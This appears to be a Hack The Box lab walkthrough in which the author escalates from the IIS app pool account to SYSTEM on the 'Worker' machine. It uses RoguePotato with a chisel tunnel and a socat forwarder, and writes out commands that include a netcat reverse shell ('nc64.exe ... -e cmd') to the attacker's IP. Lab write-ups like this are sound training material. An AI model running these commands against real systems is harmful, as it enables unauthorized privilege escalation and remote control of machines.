Rogue Potato
The compromised iis apppool\defaultapppool account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set.
this makes the target system vulnerable to the potato exploits
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 & Windows Server 2019
the target system is windows server 2019, so i will be using an alternative; roguepotato
- Rogue Potato instruct the DCOM server to perform a remote OXID query by specifying a remote IP (Attacker IP)
- On the remote IP, setup a “socat” listener for redirecting the OXID resolutions requests to a fake OXID RPC Server
- the fake oxid rpc server implements the resolveoxid2 server procedure, which will point to a controlled named pipe
ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper] - The DCOM server will connect to the RPC server in order to perform the IRemUnkown2 interface call. By connecting to the Named Pipe, an “Autentication Callback” will be performed and we could impersonate the caller via RpcImpersonateClient() call.
- then, a token stealer will:
- Get the PID of the rpcss service
- Open the process, list all handles and for each handle try to duplicate it and get the handle type
- If handle type is “Token” and token owner is SYSTEM, try to impersonate and launch a process with CreatProcessAsUser() or CreateProcessWithToken()
What do you need to make it work?
- You need to have a machine under your control where you can perform the redirect and this machine must be accessible on port 135 by the victim
- upload both exe files from the poc. In fact it is also possible to launch the fake OXID Resolver in standalone mode on a Windows machine under our control when the victim’s firewall won’t accept incoming connections. more info: https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
exploit
Exploit found online from a GitHub repository
PS C:\tmp> copy \\10.10.16.8\smb\potato\RoguePotato.exe .Delivering the complete
Tunneling
The exploitation requires tunneling due to the active firewall blocking inbound traffic, except for those 3 open ports
ps c:\tmp> copy \\10.10.16.8\smb\chiselx64.exe .Delivering the complete
Server
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ chisel server -p 55555 --reverse -v
2023/11/24 03:21:04 server: Reverse tunnelling enabled
2023/11/24 03:21:04 server: Fingerprint XrqpqYVLG4ly5Oobt3WFinyA2pq7rjTrHvtm351SoUM=
2023/11/24 03:21:04 server: Listening on http://0.0.0.0:55555Starting a chisel server on Kali
Client
ps c:\tmp> START /B C:\tmp\chiselx64.exe client 10.10.16.8:55555 R:5555:127.0.0.1:5555
tunneling the kali’s port 5555 to the target’s socket, 127.0.0.1:5555
The OXID Resolver Request will be passed back to RoguePotato.exe through the tunnel as its exploit is listening on port 5555
The tunneling command was wrapped in the START /B command to make it running in the background, so that I can continue to use the terminal
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ curl http://alpha.worker.htb/shell.aspxRe-establishing the PowerShell session
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 50813
Windows PowerShell running as user WORKER$ on WORKER
Copyright (C) Microsoft Corporation. All rights reserved.
ps c:\windows\system32\inetsrv> ps | Select-String chisel
System.Diagnostics.Process (chiselx64)Re-established and the chisel client is still up and running in the background
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:5555This network forwarder above will receive the OXID Resolver Request from RoguePotato.exe to the Kali port 135 and forward it to Kali’s tcp:127.0.0.1:5555, which is tunneled to the target socket 127.0.0.1:00
It would look like this overall, except port being 5555 not 9999
PS C:\tmp> cmd /c C:\tmp\RoguePotato.exe -r 10.10.16.8 -e "C:\tmp\nc64.exe 10.10.16.8 1234 -e cmd" -l 5555
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 5555 ...
[*] IStoragetrigger written:102 bytes
[*] SecurityCallback RPC call
[*] ServerAlive2 RPC Call
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: C:\tmp\nc64.exe 10.10.16.8 1234 -e cmd
[+] RoguePotato gave you the SYSTEM powerz :DRoguePotato.exe received the OXID Resolver Request from the Kali’s network forwarder and exploited it Successful exploit triggered the reverse shell.
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ socat -v tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:5555
> 2023/11/24 03:46:05.000306483 length=116 from=0 to=115
..\v.....t...........................`R.......!4z.....]........\b.+.H`............`R.......!4z....,..l..@E............< 2023/11/24 03:46:05.000756799 length=84 from=0 to=83
..\f.....T.................5555...........]........\b.+.H`............................> 2023/11/24 03:46:05.000939767 length=24 from=116 to=139
........................< 2023/11/24 03:46:06.000257335 length=40 from=84 to=123
........(...............................> 2023/11/24 03:46:06.000899830 length=120 from=0 to=119
..\v.....x.(.........................`R.......!4z.....]........\b.+.H`....
.......NTLMSSP.......\b.................
.cE....< 2023/11/24 03:46:07.000303108 length=216 from=0 to=215
..\f.......................5555...........]........\b.+.H`....
.......NTLMSSP.....\f.\f.8..........$.I\b.........P.P.D...
.cE....W.O.R.K.E.R...\f.W.O.R.K.E.R...\f.W.O.R.K.E.R...\f.W.o.r.k.e.r...\f.W.o.r.k.e.r.\a.\b.M...........> 2023/11/24 03:46:07.000446326 length=145 from=120 to=264
..........u.........
.......NTLMSSP.........d.......e.......X.......X...\f.\f.X.......e.......
.cE......h\f..p.f...
q.~W.O.R.K.E.R..eo..... ...;..%.> 2023/11/24 03:46:07.000537792 length=42 from=265 to=306
........*...............5...............\a.< 2023/11/24 03:46:07.000766517 length=220 from=216 to=435
............................M...M.-...l.o.c.a.l.h.o.s.t./.p.i.p.e./.R.o.g.u.e.P.o.t.a.t.o.[.\\.p.i.p.e.\\.e.p.m.a.p.p.e.r.].....
...N.T. .A.U.T.H.O.R.I.T.Y.\\.N.E.T.W.O.R.K. .S.E.R.V.I.C.E...........`R.......!4z......\a.....With the -v flag, I can also see the verbose traffic data of the Socat network forwarder
It forwarded the OXID Resolver Request to the Kali’s socket, 127.0.0.1:5555, which is tunneled to the target socket, 127.0.0.1:5555, where RoguePotato.exe was listening
┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 50974
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\tmp> whoami
whoami
nt authority\system
C:\tmp> hostname
hostname
Worker
C:\tmp> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::248
IPv6 Address. . . . . . . . . . . : dead:beef::1cb0:fbca:343f:d725
Link-local IPv6 Address . . . . . : fe80::1cb0:fbca:343f:d725%4
IPv4 Address. . . . . . . . . . . : 10.10.10.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
10.10.10.2System Level Compromise